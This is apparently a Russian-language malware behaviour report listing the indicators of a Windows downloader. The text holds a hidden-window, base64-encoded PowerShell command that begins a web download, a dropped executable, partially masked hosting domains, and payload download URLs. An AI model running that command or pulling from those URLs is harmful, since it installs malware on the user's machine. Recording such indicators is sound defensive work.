Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AXwAxADMANgA0ADIAPQAoACcAcgBfADEAJwArACcAMQA3ACcAKwAnADUAXwAnACkAOwAkAGIAXwAxADkAMQA3ADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAagAxAF8AMAAwADYANwA9AC...
- %HOMEPATH%\581.exe
- %HOMEPATH%\581.exe
- 'pa###nstore.com':80
- 'ha#####shcompany.com':80
- 'ha#####shcompany.com':443
- 'mi####tfoods.com':80
- 'mi####tfoods.com':443
- http://pa###nstore.com/alYc5u7PCe_w
- http://ha#####shcompany.com/2vqObycriG
- http://mi####tfoods.com/wp-content/odbfx8yt_5yvdgPL6
- 'ha#####shcompany.com':443
- 'mi####tfoods.com':443
- DNS ASK cp###ech.com
- DNS ASK pa###nstore.com
- DNS ASK ha#####shcompany.com
- DNS ASK mi####tfoods.com
- DNS ASK ng####dachung.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AXwAxADMANgA0ADIAPQAoACcAcgBfADEAJwArACcAMQA3ACcAKwAnADUAXwAnACkAOwAkAGIAXwAxADkAMQA3ADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAagAxAF8AMAAwADYANwA9AC...' (со скрытым окном)